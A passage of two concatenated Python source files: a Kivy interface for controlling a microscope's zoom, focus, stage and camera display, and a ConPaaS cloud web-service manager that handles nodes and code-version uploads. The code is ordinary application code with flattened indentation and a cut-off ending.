from kivy.config import Config
from kivy.core.window import Window
from kivy.clock import Clock
from threading import Thread
from kivy.uix.gridlayout import GridLayout
import sys
sys.path.append("..\\src")
from MicroscopeControl import MicroscopeController
from CustomBoxLayout import CustomBoxLayout
from ImageDisplay import ImageDisplay
import numpy as np
class accordionWidget(Accordion):
def __init__(self, *args, **kwargs):
kwargs['orientation'] = 'vertical'
kwargs['size_hint_x'] = 2
super(accordionWidget, self).__init__(*args, **kwargs)
#root = Accordion(orientation='vertical', size_hint_x=2)
item1 = AccordionItem(title='Camera')
item1.add_widget(Slider(min=-100, max=100, value=25))
self.add_widget(item1)
item2 = AccordionItem(title='Zoom and Focus')
box2 = BoxLayout(orientation='vertical')
instructions = Label(text='Enter a value between 0 and 1',size_hint_y=1)
box2.add_widget(instructions)
label1 = BoxLayout(orientation='horizontal',size_hint_y=1)
zoomLabel = Label(text='Zoom',size_hint_x=None,width=100, size_hint_y=None, height=40)
ZminusButton = Button(text='-',size_hint_x=None,width=30,size_hint_y=None,height=40)
self.zoomInput = TextInput(text='0.005',multiline=False,size_hint_x=None,width=100,size_hint_y=None,height=40)
ZplusButton = Button(text='+',size_hint_x=None,width=30,size_hint_y=None,height=40)
label1.add_widget(zoomLabel)
label1.add_widget(ZminusButton)
label1.add_widget(self.zoomInput)
label1.add_widget(ZplusButton)
box2.add_widget(label1)
self.zoomInput.bind(on_text_validate=self.setZoom)
ZminusButton.bind(on_release=self.incrementZoomMinus)
ZplusButton.bind(on_release=self.incrementZoomPlus)
instructions2 = Label(text='Enter a value between 0 and 1',size_hint_y=1)
box2.add_widget(instructions2)
label2 = BoxLayout(orientation='horizontal',size_hint_y=1)
focusLabel = Label(text='Focus',size_hint_x=None, width=100,size_hint_y=None,height=40)
FminusButton = Button(text='-',size_hint_x=None,width=30,size_hint_y=None,height=40)
self.focusInput = TextInput(text='0.005',multiline=False,size_hint_x=None,width=100,size_hint_y=None,height=40)
FplusButton = Button(text='+',size_hint_x=None,width=30,size_hint_y=None,height=40)
box2.add_widget(label2)
label2.add_widget(focusLabel)
label2.add_widget(FminusButton)
label2.add_widget(self.focusInput)
label2.add_widget(FplusButton)
self.focusInput.bind(on_text_validate=self.setFocus)
FminusButton.bind(on_release=self.incrementFocusMinus)
FplusButton.bind(on_release=self.incrementFocusPlus)
item2.add_widget(box2)
self.add_widget(item2)
item3 = AccordionItem(title='Stage Control')
gridLayout = GridLayout(cols=3)
gridLayout.add_widget(Button(opacity=0))
moveUp = Button(text='Up')
gridLayout.add_widget(moveUp)
gridLayout.add_widget(Button(opacity=0))
moveLeft = Button(text='Left')
gridLayout.add_widget(moveLeft)
gridLayout.add_widget(Button(opacity=0))
moveRight = Button(text='Right')
gridLayout.add_widget(moveRight)
gridLayout.add_widget(Button(opacity=0))
moveDown = Button(text='Down')
gridLayout.add_widget(moveDown)
gridLayout.add_widget(Button(opacity=0))
moveUp.bind(on_press=self.clockMoveUp)
moveUp.bind(on_release=self.stopClock)
item3.add_widget(gridLayout)
self.add_widget(item3)
item4 = AccordionItem(title='Image Settings')
item4.add_widget(Slider(min=-100, max=100, value=25))
self.add_widget(item4)
self.microscope = None
# self.zooming = False
# self.zoom_value = 0.5
# self.closing = False
# self.zoom_thread = Thread(target=self.adjustZoom)
# self.zoom_thread.start()
# self.focusing = False
# self.focus_value = 0.5
# self.focus_thread = Thread(target=self.adjustFocus)
# self.focus_thread.start()
def close(self):
pass
# def adjustZoom(self):
# while not self.closing:
# if self.microscope is not None and not self.zooming:
# current = self.microscope.focus.getZoom()
# if np.abs(current - self.zoom_value) > 0.005 and not self.zooming:
# def done():
# self.zooming = False
# self.zooming = True
# self.microscope.focus.setZoom(self.zoom_value, corrected=False, callback=done)
def setZoom(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting zoom")
#print(dir(object))
value = object.text
print(value)
try:
value = float(value)
except Exception as ex:
return
if value >= 0.005 and value <= 0.995:
print(value)
self.microscope.focus.setZoom(value, corrected=False, cb=done)
else:
print("Invalid input")
# def adjustFocus(self):
# while not self.closing:
# if self.microscope is not None and not self.focusing:
# current = self.microscope.focus.getFocus()
# if np.abs(current - self.focus_value) > 0.005 and not self.focusing:
# def done():
# self.focusing = False
# self.focusing = True
# self.microscope.focus.setFocus(self.focus_value, corrected=False, callback=done)
def setFocus(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting focus")
value = object.text
print(value)
try:
value=float(value)
except Exception as ex:
return
if value >= 0.005 and value <= 0.995:
self.microscope.focus.setFocus(value, corrected=False, cb=done)
else:
print("Invalid input")
def setMicroscope(self, ms):
self.microscope = ms
def incrementZoomMinus(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting focus")
value = float(self.zoomInput.text)
value -= 0.1
self.zoomInput.text = "%1.4f"%value
if value >= 0.005 and value <= 0.995:
self.microscope.focus.setZoom(value, corrected=False, cb=done)
else:
print("Invalid input")
def incrementZoomPlus(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting focus")
value = float(self.zoomInput.text)
value += 0.1
self.zoomInput.text = "%1.4f"%value
if value >= 0.005 and value <= 0.995:
self.microscope.focus.setZoom(value, corrected=False, cb=done)
else:
print("Invalid input")
def incrementFocusMinus(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting focus")
value = float(self.focusInput.text)
value -= 0.1
self.focusInput.text = "%1.4f"%value
if value >= 0.005 and value <= 0.995:
self.microscope.focus.setFocus(value, corrected=False, cb=done)
else:
print("Invalid input")
def incrementFocusPlus(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting focus")
value = float(self.focusInput.text)
value += 0.1
self.focusInput.text = "%1.4f"%value
if value >= 0.005 and value <= 0.995:
self.microscope.focus.setFocus(value, corrected=False, cb=done)
else:
print("Invalid input")
def moveIncrementUp(self,a):
def done(error, value):
if error is None:
print(value)
else:
print(error)
self.microscope.stage.moveDelta(0, 0.01, cb=done)
def clockMoveUp(self,a):
Clock.schedule_interval(self.moveIncrementUp,0.01)
def stopClock(self, a):
Clock.unschedule(self.moveIncrementUp)
class userInterface(BoxLayout):
def initializeMicroscope(self):
self.microscope = MicroscopeController()
def close(self):
self.accordion.close()
if self.microscope is not None:
self.microscope.cleanup()
def __init__(self, **kwargs):
kwargs['orientation'] = 'horizontal'
super(userInterface, self).__init__(**kwargs)
self.accordion = accordionWidget()
self.add_widget(self.accordion)
self.display = BoxLayout(orientation='vertical', size_hint_x=4)
self.microscope = None
Thread(target=self.initializeMicroscope).start()
self.microscope_loaded = False
def checkMicroscope(a):
if not self.microscope_loaded and self.microscope is not None:
self.microscope_loaded = True
self.microscope.camera.enableLowRes()
self.accordion.setMicroscope(self.microscope)
self.microscope.camera.startCapture()
if self.microscope_loaded:
img = self.microscope.camera.getFrame()
img = np.rot90(img, 3, axes=(0, 1))
img = np.flipud(img)
self.image_display.setImage(img)
Clock.schedule_interval(checkMicroscope, 1 / 10)
# def _check_process(b):
# self.load_progress.value = self.current_progress
# if not t.is_alive():
# Clock.unschedule(_check_process)
# self.load_progress.opacity = 0
# self._parent_obj.interface.preview_pane.loadThumbnails(
# self._parent_obj.dataset
# )
# Clock.schedule_interval(_check_process, .025)
# self.display.add_widget(
# AsyncImage(source="https://images.squarespace-cdn.com/content/v1/5a5906400abd0406785519dd/1552662149940-G6MMFW3JC2J61UBPROJ5/ke17ZwdGBToddI8pDm48kLkXF2pIyv_F2eUT9F60jBl7gQa3H78H3Y0txjaiv_0fDoOvxcdMmMKkDsyUqMSsMWxHk725yiiHCCLfrh8O1z4YTzHvnKhyp6Da-NYroOW3ZGjoBKy3azqku80C789l0iyqMbMesKd95J-X4EagrgU9L3Sa3U8cogeb0tjXbfawd0urKshkc5MgdBeJmALQKw/baelen.jpg?format=1500w",size_hint_y=10)
# )
self.image_display = ImageDisplay(orientation='vertical', size_hint_y=10)
self.display.add_widget(self.image_display)
img = np.random.normal(0.0, 127, (1024, 1024, 3)).astype(np.uint8)
self.image_display.setImage(img)
self.input1 = BoxLayout(orientation='horizontal',size_hint_y=None, height=30)
xLabel = Label(text='X=',size_hint_x=1, size_hint_y=None, height=30)
self.xInput = TextInput(multiline=False,size_hint_x=4, size_hint_y=None, height=30)
yLabel = Label(text='Y=',size_hint_x=1, size_hint_y=None, height=30)
self.yInput = TextInput(multiline=False,size_hint_x=4, size_hint_y=None, height=30)
self.input1.add_widget(xLabel)
self.input1.add_widget(self.xInput)
#self.input2 = BoxLayout(orientation='horizontal',size_hint_y=1)
self.input1.add_widget(yLabel)
self.input1.add_widget(self.yInput)
self.add_widget(self.display)
self.display.add_widget(self.input1)
#self.display.add_widget(self.input2)
self.yInput.bind(on_text_validate=self.moveTo)
self.xInput.bind(on_text_validate=self.moveTo)
def moveTo(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error moving stage")
xvalue = self.xInput.text
yvalue = self.yInput.text
print(xvalue, yvalue)
if xvalue.strip() == "" or xvalue is None:
xvalue = "0.0"
if yvalue.strip() == "" or yvalue is None:
yvalue = "0.0"
try:
xvalue=float(xvalue)
yvalue=float(yvalue)
except Exception as ex:
return
print(xvalue, yvalue)
if xvalue >= -50 and xvalue <= 50:
if yvalue >= -44 and yvalue <= 37:
self.microscope.stage.moveTo(xvalue, yvalue, callback=done)
else:
print("Invalid input")
class userInterfaceApp(App):
def on_request_close(self, *args):
print("close called")
self.interface.close()
return False
def build(self):
self.interface = userInterface()
Window.bind(on_request_close=self.on_request_close)
return self.interface
if __name__=="__main__":
Config.set('input', 'mouse', 'mouse,multitouch_on_demand')
userInterfaceApp().run()
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
import memcache, tempfile, os, os.path, time
from conpaas.services.webservers.agent import client
from conpaas.services.webservers.manager.config import WebServiceNode, CodeVersion
from conpaas.services.webservers.misc import archive_open, archive_get_members, archive_close,\
archive_get_type
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse,\
HttpFileDownloadResponse, FileUploadField
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.manager import ManagerException
from conpaas.core import git
class BasicWebserversManager(BaseManager):
# memcache keys
CONFIG = 'config'
DEPLOYMENT_STATE = 'deployment_state'
def __init__(self, config_parser):
BaseManager.__init__(self, config_parser)
self.controller.generate_context('web')
self.memcache = memcache.Client([config_parser.get('manager', 'MEMCACHE_ADDR')])
from conpaas.services.webservers.manager import config
config.memcache = self.memcache
self.code_repo = config_parser.get('manager', 'CODE_REPO')
self.state_log = []
def _state_get(self):
return self.memcache.get(self.DEPLOYMENT_STATE)
def _state_set(self, target_state, msg=''):
self.memcache.set(self.DEPLOYMENT_STATE, target_state)
self.state_log.append({'time': time.time(), 'state': target_state, 'reason': msg})
self.logger.debug('STATE %s: %s' % (target_state, msg))
def _configuration_get(self):
return self.memcache.get(self.CONFIG)
def _configuration_set(self, config):
self.memcache.set(self.CONFIG, config)
def _adapting_set_count(self, count):
self.memcache.set('adapting_count', count)
def _adapting_get_count(self):
return self.memcache.get('adapting_count')
def _stop_proxy(self, config, nodes):
for serviceNode in nodes:
try: client.stopHttpProxy(serviceNode.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop proxy at node %s' % str(serviceNode))
self._state_set(self.S_ERROR, msg='Failed to stop proxy at node %s' % str(serviceNode))
raise
def _start_web(self, config, nodes):
if config.prevCodeVersion == None:
code_versions = [config.currentCodeVersion]
else:
code_versions = [config.currentCodeVersion, config.prevCodeVersion]
for serviceNode in nodes:
try:
client.createWebServer(serviceNode.ip, 5555,
config.web_config.port,
code_versions)
except client.AgentException:
self.logger.exception('Failed to start web at node %s' % str(serviceNode))
self._state_set(self.S_ERROR, msg='Failed to start web at node %s' % str(serviceNode))
raise
def _update_web(self, config, nodes):
if config.prevCodeVersion == None:
code_versions = [config.currentCodeVersion]
else:
code_versions = [config.currentCodeVersion, config.prevCodeVersion]
for webNode in nodes:
try: client.updateWebServer(webNode.ip, 5555,
config.web_config.port,
code_versions)
except client.AgentException:
self.logger.exception('Failed to update web at node %s' % str(webNode))
self._state_set(self.S_ERROR, msg='Failed to update web at node %s' % str(webNode))
raise
def _stop_web(self, config, nodes):
for serviceNode in nodes:
try: client.stopWebServer(serviceNode.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop web at node %s' % str(serviceNode))
self._state_set(self.S_ERROR, msg='Failed to stop web at node %s' % str(serviceNode))
raise
@expose('POST')
def startup(self, kwargs):
config = self._configuration_get()
dstate = self._state_get()
if dstate != self.S_INIT and dstate != self.S_STOPPED:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
if config.proxy_count == 1 \
and (config.web_count == 0 or config.backend_count == 0):# at least one is packed
if config.web_count == 0 and config.backend_count == 0:# packed
serviceNodeKwargs = [ {'runProxy':True, 'runWeb':True, 'runBackend':True} ]
elif config.web_count == 0 and config.backend_count > 0:# web packed, backend separated
serviceNodeKwargs = [ {'runBackend':True} for _ in range(config.backend_count) ]
serviceNodeKwargs.append({'runProxy':True, 'runWeb':True})
elif config.web_count > 0 and config.backend_count == 0:# proxy separated, backend packed
serviceNodeKwargs = [ {'runWeb':True} for _ in range(config.web_count) ]
serviceNodeKwargs.append({'runProxy':True, 'runBackend':True})
else:
if config.web_count < 1: config.web_count = 1 # have to have at least one web
if config.backend_count < 1: config.backend_count = 1 # have to have at least one backend
serviceNodeKwargs = [ {'runProxy':True} for _ in range(config.proxy_count) ]
serviceNodeKwargs.extend([ {'runWeb':True} for _ in range(config.web_count) ])
serviceNodeKwargs.extend([ {'runBackend':True} for _ in range(config.backend_count) ])
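# e.g. with proxy_count=1, web_count=2 and backend_count=2 the list built above is
# [{'runProxy': True}, {'runWeb': True}, {'runWeb': True},
#  {'runBackend': True}, {'runBackend': True}]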
self._state_set(self.S_PROLOGUE, msg='Starting up')
kwargs['config'] = config
kwargs['serviceNodeKwargs'] = serviceNodeKwargs
Thread(target=self.do_startup, kwargs=kwargs).start()
return HttpJsonResponse({'state': self.S_PROLOGUE})
@expose('POST')
def shutdown(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
dstate = self._state_get()
if dstate != self.S_RUNNING:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
config = self._configuration_get()
self._state_set(self.S_EPILOGUE, msg='Shutting down')
Thread(target=self.do_shutdown, args=[config]).start()
return HttpJsonResponse({'state': self.S_EPILOGUE})
def do_startup(self, config, serviceNodeKwargs, cloud):
self.logger.debug('do_startup: Going to request %d new nodes' % len(serviceNodeKwargs))
try:
cloud = self._init_cloud(cloud)
except Exception:
self.logger.exception("A cloud named '%s' could not be found" % cloud)
self._state_set(self.S_STOPPED, msg='Unknown cloud: %s' % cloud)
return
try:
self._adapting_set_count(len(serviceNodeKwargs))
node_instances = self.controller.create_nodes(len(serviceNodeKwargs),
client.check_agent_process, 5555, cloud)
except:
self.logger.exception('do_startup: Failed to request new nodes. Needed %d' % (len(serviceNodeKwargs)))
self._state_set(self.S_STOPPED, msg='Failed to request new nodes')
return
finally:
self._adapting_set_count(0)
config.serviceNodes.clear()
i = 0
for kwargs in serviceNodeKwargs:
config.serviceNodes[node_instances[i].id] = WebServiceNode(node_instances[i], **kwargs)
i += 1
config.update_mappings()
# issue orders to agents to start PHP inside
self._start_backend(config, config.getBackendServiceNodes())
# stage the code files
# NOTE: Code update is done after starting the backend
# because tomcat-create-instance complains if its
# directory exists when it is run and placing the
# code can only be done after creating the instance
if config.currentCodeVersion != None:
self._update_code(config, config.serviceNodes.values())
# issue orders to agents to start web servers inside
self._start_web(config, config.getWebServiceNodes())
# issue orders to agents to start proxy inside
self._start_proxy(config, config.getProxyServiceNodes())
self._configuration_set(config) # update configuration
self._state_set(self.S_RUNNING)
self.memcache.set('nodes_additional', [])
def do_shutdown(self, config):
self._stop_proxy(config, config.getProxyServiceNodes())
self._stop_web(config, config.getWebServiceNodes())
self._stop_backend(config, config.getBackendServiceNodes())
self.controller.delete_nodes(config.serviceNodes.values())
config.serviceNodes = {}
self._state_set(self.S_STOPPED)
self._configuration_set(config)
@expose('POST')
def add_nodes(self, kwargs):
config = self._configuration_get()
dstate = self._state_get()
if dstate != self.S_RUNNING:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
backend = 0
web = 0
proxy = 0
if 'backend' in kwargs:
if not isinstance(kwargs['backend'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "backend"').message)
backend = int(kwargs.pop('backend'))
if backend < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "backend"').message)
if 'web' in kwargs:
if not isinstance(kwargs['web'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "web"').message)
web = int(kwargs.pop('web'))
if web < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "web"').message)
if 'proxy' in kwargs:
if not isinstance(kwargs['proxy'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "proxy"').message)
proxy = int(kwargs.pop('proxy'))
if proxy < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "proxy"').message)
if (backend + web + proxy) < 1:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, ['backend', 'web', 'proxy'], detail='Need a positive value for at least one').message)
if (proxy + config.proxy_count) > 1 and ( (web + config.web_count) == 0 or (backend + config.backend_count) == 0 ):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Cannot add more proxy servers without at least one "web" and one "backend"').message)
self._state_set(self.S_ADAPTING, msg='Going to add proxy=%d, web=%d, backend=%d' % (proxy, web, backend))
Thread(target=self.do_add_nodes, args=[config, proxy, web, backend, kwargs['cloud']]).start()
return HttpJsonResponse()
def do_add_nodes(self, config, proxy, web, backend, cloud):
webNodesNew = []
proxyNodesNew = []
backendNodesNew = []
webNodesKill = []
backendNodesKill = []
try:
cloud = self._init_cloud(cloud)
except Exception:
self.logger.exception("A cloud named '%s' could not be found" % cloud)
self._state_set(self.S_RUNNING, msg='Unknown cloud: %s' % cloud)
return
if backend > 0 and config.backend_count == 0:
backendNodesKill.append(config.getBackendServiceNodes()[0])
if web > 0 and config.web_count == 0:
webNodesKill.append(config.getWebServiceNodes()[0])
for _ in range(backend): backendNodesNew.append({'runBackend':True})
for _ in range(web): webNodesNew.append({'runWeb':True})
for _ in range(proxy): proxyNodesNew.append({'runProxy':True})
for i in webNodesKill: i.isRunningWeb = False
for i in backendNodesKill: i.isRunningBackend = False
newNodes = []
try:
self._adapting_set_count(len(proxyNodesNew) + len(webNodesNew) + len(backendNodesNew))
node_instances = self.controller.create_nodes(len(proxyNodesNew) + len(webNodesNew) + len(backendNodesNew),
client.check_agent_process, 5555, cloud)
except:
self.logger.exception('do_add_nodes: Failed to request new nodes. Needed %d' % (len(proxyNodesNew + webNodesNew + backendNodesNew)))
self._state_set(self.S_RUNNING, msg='Failed to request new nodes. Reverting to old configuration')
return
finally:
self._adapting_set_count(0)
i = 0
for kwargs in proxyNodesNew + webNodesNew + backendNodesNew:
config.serviceNodes[node_instances[i].id] = WebServiceNode(node_instances[i], **kwargs)
newNodes += [ config.serviceNodes[node_instances[i].id] ]
i += 1
config.update_mappings()
# create new service nodes
self._start_backend(config, [ node for node in newNodes if node.isRunningBackend ])
# stage code files in all new VMs
# NOTE: Code update is done after starting the backend
# because tomcat-create-instance complains if its
# directory exists when it is run and placing the
# code can only be done after creating the instance
if config.currentCodeVersion != None:
self._update_code(config, [ node for node in newNodes if node not in config.serviceNodes ])
self._start_web(config, [ node for node in newNodes if node.isRunningWeb ])
self._start_proxy(config, [ node for node in newNodes if node.isRunningProxy ])
# update services
if webNodesNew or backendNodesNew:
self._update_proxy(config, [ i for i in config.serviceNodes.values() if i.isRunningProxy and i not in newNodes ])
# remove the old nodes
self._stop_backend(config, backendNodesKill)
self._stop_web(config, webNodesKill)
config.proxy_count = len(config.getProxyServiceNodes())
config.backend_count = len(config.getBackendServiceNodes())
if config.backend_count == 1 and config.getBackendServiceNodes()[0] in config.getProxyServiceNodes():
config.backend_count = 0
config.web_count = len(config.getWebServiceNodes())
if config.web_count == 1 and config.getWebServiceNodes()[0] in config.getProxyServiceNodes():
config.web_count = 0
self._state_set(self.S_RUNNING)
self._configuration_set(config)
self.memcache.set('nodes_additional', [])
@expose('POST')
def remove_nodes(self, kwargs):
config = self._configuration_get()
backend = 0
web = 0
proxy = 0
if 'backend' in kwargs:
if not isinstance(kwargs['backend'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "backend"').message)
backend = int(kwargs.pop('backend'))
if backend < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "backend"').message)
if 'web' in kwargs:
if not isinstance(kwargs['web'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "web"').message)
web = int(kwargs.pop('web'))
if web < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "web"').message)
if 'proxy' in kwargs:
if not isinstance(kwargs['proxy'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "proxy"').message)
proxy = int(kwargs.pop('proxy'))
if proxy < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "proxy"').message)
if (backend + web + proxy) < 1:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, ['backend', 'web', 'proxy'], detail='Need a positive value for at least one').message)
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
if config.proxy_count - proxy < 1: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Not enough proxy nodes will be left').message)
if config.web_count - web < 1 and config.proxy_count - proxy > 1:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Not enough web nodes will be left').message)
if config.web_count - web < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Cannot remove that many web nodes').message)
if config.backend_count - backend < 1 and config.proxy_count - proxy > 1:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Not enough backend nodes will be left').message)
if config.backend_count - backend < 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Cannot remove that many backend nodes').message)
dstate = self._state_get()
if dstate != self.S_RUNNING:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
self._state_set(self.S_ADAPTING, msg='Going to remove proxy=%d, web=%d, backend=%d' %(proxy, web, backend))
Thread(target=self.do_remove_nodes, args=[config, proxy, web, backend]).start()
return HttpJsonResponse()
def do_remove_nodes(self, config, proxy, web, backend):
packBackend = False
packWeb = False
packingNode = None
backendNodesKill = []
webNodesKill = []
proxyNodesKill = []
if web > 0:
webNodesKill += config.getWebServiceNodes()[-web:]
if config.web_count - web == 0:
packWeb = True
if backend > 0:
backendNodesKill += config.getBackendServiceNodes()[-backend:]
if config.backend_count - backend == 0:
packBackend = True
if proxy > 0:
proxyNodesKill += config.getProxyServiceNodes()[-proxy:]
packingNode = config.getProxyServiceNodes()[0]
for i in webNodesKill: i.isRunningWeb = False
for i in backendNodesKill: i.isRunningBackend = False
for i in proxyNodesKill: i.isRunningProxy = False
if packBackend: packingNode.isRunningBackend = True
if packWeb: packingNode.isRunningWeb = True
config.update_mappings()
# new nodes
if packBackend:
# NOTE: Code update is done after starting the backend
# because tomcat-create-instance complains if its
# directory exists when it is run and placing the
# code can only be done after creating the instance
self._start_backend(config, [packingNode])
self._update_code(config, [packingNode])
if packWeb: self._start_web(config, [packingNode])
if webNodesKill or backendNodesKill:
self._update_proxy(config, [ i for i in config.serviceNodes.values() if i.isRunningProxy and i not in proxyNodesKill ])
# remove nodes
self._stop_backend(config, backendNodesKill)
self._stop_web(config, webNodesKill)
self._stop_proxy(config, proxyNodesKill)
for i in config.serviceNodes.values():
if not i.isRunningBackend and not i.isRunningWeb and not i.isRunningProxy:
del config.serviceNodes[i.id]
self.controller.delete_nodes([i])
config.proxy_count = len(config.getProxyServiceNodes())
config.backend_count = len(config.getBackendServiceNodes())
if config.backend_count == 1 and config.getBackendServiceNodes()[0] in config.getProxyServiceNodes():
config.backend_count = 0
config.web_count = len(config.getWebServiceNodes())
if config.web_count == 1 and config.getWebServiceNodes()[0] in config.getProxyServiceNodes():
config.web_count = 0
self._state_set(self.S_RUNNING)
self._configuration_set(config)
@expose('GET')
def list_nodes(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
dstate = self._state_get()
if dstate != self.S_RUNNING and dstate != self.S_ADAPTING:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
config = self._configuration_get()
return HttpJsonResponse({
'proxy': [ serviceNode.id for serviceNode in config.getProxyServiceNodes() ],
'web': [ serviceNode.id for serviceNode in config.getWebServiceNodes() ],
'backend': [ serviceNode.id for serviceNode in config.getBackendServiceNodes() ]
})
@expose('GET')
def get_node_info(self, kwargs):
if 'serviceNodeId' not in kwargs: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, 'serviceNodeId').message)
serviceNodeId = kwargs.pop('serviceNodeId')
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
config = self._configuration_get()
if serviceNodeId not in config.serviceNodes: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Invalid "serviceNodeId"').message)
serviceNode = config.serviceNodes[serviceNodeId]
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'isRunningProxy': serviceNode.isRunningProxy,
'isRunningWeb': serviceNode.isRunningWeb,
'isRunningBackend': serviceNode.isRunningBackend,
}
})
@expose('GET')
def list_authorized_keys(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
return HttpJsonResponse({ 'authorizedKeys': git.get_authorized_keys() })
@expose('GET')
def list_code_versions(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
config = self._configuration_get()
versions = []
for version in config.codeVersions.values():
item = {'codeVersionId': version.id, 'filename': version.filename, 'description': version.description, 'time': version.timestamp}
if version.id == config.currentCodeVersion: item['current'] = True
versions.append(item)
versions.sort(key=(lambda x: x['time']), reverse=True)
return HttpJsonResponse({'codeVersions': versions})
@expose('GET')
def download_code_version(self, kwargs):
if 'codeVersionId' not in kwargs:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, 'codeVersionId').message)
if isinstance(kwargs['codeVersionId'], dict):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='codeVersionId should be a string').message)
codeVersion = kwargs.pop('codeVersionId')
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
config = self._configuration_get()
if codeVersion not in config.codeVersions:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Invalid codeVersionId').message)
filename = os.path.abspath(os.path.join(self.code_repo, codeVersion))
if not filename.startswith(self.code_repo + '/') or not os.path.exists(filename):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Invalid codeVersionId').message)
return HttpFileDownloadResponse(config.codeVersions[codeVersion].filename, filename)
@expose('UPLOAD')
def upload_code_version(self, kwargs):
if 'code' not in kwargs:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, 'code').message)
code = kwargs.pop('code')
if 'description' in kwargs: description = kwargs.pop('description')
else: description = ''
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
if not isinstance(code, FileUploadField):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='code should be a file').message)
config = self._configuration_get()
fd, name = tempfile.mkstemp(prefix='code-', dir=self.code_repo)
fd = os.fdopen(fd, 'w')
upload = code.file
codeVersionId = os.path.basename(name)
bytes = upload.read(2048)
while len(bytes) != 0:
fd.write(bytes)
bytes = upload.read(2048)
fd.close()
arch = archive_open(name)
if arch is None:
os.remove(name)
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Invalid archive format').message)
for fname in archive_get_members(arch):
if fname.startswith('/') or fname.startswith('..'):
archive_close(arch)
os.remove(name)
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Absolute or parent-relative file names are not allowed in archive members').message)
archive_close(arch)
config.codeVersions[codeVersionId] = CodeVersion(codeVersionId, os.path.basename(code.filename), archive_get_type(name), description=description)
self._configuration_set(config)
return HttpJsonResponse({'codeVersionId': os.path.basename(codeVersionId)})
@expose('UPLOAD')
def upload_authorized_key(self, kwargs):
if 'key' not in kwargs:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, 'key').message)
key = kwargs.pop('key')
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
if not isinstance(key, FileUploadField):
